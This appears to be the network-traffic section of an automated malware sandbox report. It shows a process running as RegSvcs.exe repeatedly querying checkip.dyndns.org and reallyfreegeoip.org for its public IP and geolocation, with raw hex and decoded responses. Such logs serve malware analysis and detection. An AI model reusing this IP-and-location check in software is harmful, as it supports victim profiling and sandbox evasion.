                                                                                                                      Date: Sat, 11 Jan 2025 05:49:27 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 104
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      9192.168.2.949898193.122.6.168807824C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Jan 11, 2025 06:49:28.252887964 CET127OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Jan 11, 2025 06:49:28.876182079 CET273INHTTP/1.1 200 OK
                                                                                                                      Date: Sat, 11 Jan 2025 05:49:28 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 104
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      10192.168.2.949906193.122.6.168807824C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Jan 11, 2025 06:49:29.493094921 CET127OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Jan 11, 2025 06:49:30.118597984 CET273INHTTP/1.1 200 OK
                                                                                                                      Date: Sat, 11 Jan 2025 05:49:30 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 104
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.9 | 49917 | 193.122.6.168 | 80 | 7824 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 06:49:30.747334957 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 11, 2025 06:49:31.382316113 CET | 273 | IN | HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 05:49:31 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.9 | 49928 | 193.122.6.168 | 80 | 7824 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 06:49:32.022583008 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 11, 2025 06:49:32.663877010 CET | 273 | IN | HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 05:49:32 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.9 | 49938 | 193.122.6.168 | 80 | 7824 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 06:49:33.271677017 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 11, 2025 06:49:33.916858912 CET | 273 | IN | HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 05:49:33 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.9 | 49948 | 193.122.6.168 | 80 | 7824 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 06:49:34.541174889 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 11, 2025 06:49:35.203424931 CET | 273 | IN | HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 05:49:35 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.9 | 49957 | 193.122.6.168 | 80 | 7824 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 06:49:35.814078093 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 11, 2025 06:49:36.440383911 CET | 273 | IN | HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 05:49:36 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49770 | 104.21.32.1 | 443 | 7496 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-11 05:49:11 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2025-01-11 05:49:11 UTC | 859 | IN | HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 05:49:11 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1889340
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YO%2BJYN80FSF19UGQTxTWI30l8VLFipUUT1U9WnJcfOtMLe%2BGM43HABDG7xwpWjVcdMU%2BJ%2Fy6KZsPhh1GQq%2FyoOqM6QOf1AEnbiIYDOxsLrtMKyX3mtHSU4IUSjAoHpB9keAvGzmN"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90029f43ca261875-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1547&min_rtt=1538&rtt_var=595&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1809169&cwnd=153&unsent_bytes=0&cid=daccf7a83e7ccd2f&ts=190&x=0"
2025-01-11 05:49:11 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.9 | 49776 | 104.21.32.1 | 443 | 7496 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-11 05:49:12 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
2025-01-11 05:49:12 UTC | 859 | IN | HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 05:49:12 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1889341
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jOEWM8hJbVQHslM%2BaP0YXAGWfd%2Bs%2BgazuMOAwEvwI24uTE%2FzpY98frnnH8f0hoO5zJsj2YupugeXS1S6ghvEHFZrIKZp6b%2F9hLcbwu91LicqVpabUkkr76daUdvsa1gnMIJy2yy2"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90029f48dc81c327-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1645&min_rtt=1639&rtt_var=626&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1730883&cwnd=189&unsent_bytes=0&cid=f71c0d4866db918a&ts=140&x=0"
2025-01-11 05:49:12 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.9 | 49788 | 104.21.32.1 | 443 | 7496 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-11 05:49:13 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
2025-01-11 05:49:13 UTC | 861 | IN | HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 05:49:13 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1889342
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aO%2BcoyfoOJwTNwYq3tNu2jvyGsv%2FCdw8ZfQqV56crk5EZVX2APYedd%2FYus1KtxokHNOVdrHfppF8i31gvWAXA9K73aAy7Hjgvy6OC8CKm%2BtGgTbnbZUcj%2BDiqE8qcMLbHj7%2Bx3em"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90029f50a990c327-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1597&min_rtt=1589&rtt_var=612&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1766485&cwnd=189&unsent_bytes=0&cid=c851a7d2e178a6fb&ts=134&x=0"
2025-01-11 05:49:13 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.9 | 49796 | 104.21.32.1 | 443 | 7496 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-11 05:49:14 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
2025-01-11 05:49:15 UTC | 859 | IN | HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 05:49:14 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1889344
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0p%2FYFODNxxLaXEXgPqXcXrk8t3Niu%2F3O2C%2B2l8d81NDy6peoq28%2FTwEcqQDfkMidWYmGDbdf33sdTjGaQ94jX7nY2CzllkAHuKvgMDnfDipSqUtIjOjOH4nQU9ddU7vvhGD%2F4zIo"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90029f587a1d41a6-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1570&min_rtt=1559&rtt_var=607&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1768625&cwnd=241&unsent_bytes=0&cid=ce2977582c022089&ts=152&x=0"
2025-01-11 05:49:15 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID: 4 | Source IP: 192.168.2.9 | Source Port: 49807 | Destination IP: 104.21.32.1 | Destination Port: 443 | PID: 7496 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp: 2025-01-11 05:49:16 UTC | Bytes transferred: 85 | Direction: OUT
GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
Timestamp: 2025-01-11 05:49:16 UTC | Bytes transferred: 859 | Direction: IN
HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 05:49:16 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1889345
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lIfiJBSn7XNF4kmh1yZBSamiKWqmSY8rHOs8Ewq4sL0FLgG1hvptCU%2BHCAdn%2F%2Bn%2FkI4Fr0dvBBrrcN98EVDimT1DimJUwLGtU6ckNwvkTNMi5lkGGLviQuJQ%2Ba2bDlgI6dPe4LTw"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90029f606ace8cda-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1805&min_rtt=1803&rtt_var=680&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1604395&cwnd=243&unsent_bytes=0&cid=0b58d2b63d2c1f93&ts=141&x=0"
Timestamp: 2025-01-11 05:49:16 UTC | Bytes transferred: 362 | Direction: IN
Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID: 5 | Source IP: 192.168.2.9 | Source Port: 49815 | Destination IP: 104.21.32.1 | Destination Port: 443 | PID: 7496 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp: 2025-01-11 05:49:17 UTC | Bytes transferred: 61 | Direction: OUT
GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Timestamp: 2025-01-11 05:49:17 UTC | Bytes transferred: 864 | Direction: IN
HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 05:49:17 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1889346
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sf9ZakFtNmede5hAWndJGro6x%2B%2BfoYA4kaX5fXrnXVDZcLNKgRTJcC%2FVdl6d%2BKd5iqsTtbB1WV7jDeGk1ar%2BP7bJn9NXsb9ZQ23TkOtPKf%2FQl1Q%2FErmWT2eb4J7E3a1%2ByxgakBAC"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90029f687bda4344-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1644&min_rtt=1640&rtt_var=623&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1746411&cwnd=47&unsent_bytes=0&cid=de104d878b1d310a&ts=155&x=0"
Timestamp: 2025-01-11 05:49:17 UTC | Bytes transferred: 362 | Direction: IN
Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID: 6 | Source IP: 192.168.2.9 | Source Port: 49826 | Destination IP: 104.21.32.1 | Destination Port: 443 | PID: 7496 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp: 2025-01-11 05:49:18 UTC | Bytes transferred: 61 | Direction: OUT
GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Timestamp: 2025-01-11 05:49:18 UTC | Bytes transferred: 859 | Direction: IN
HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 05:49:18 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1889347
Cache-Control: max-age=31536000
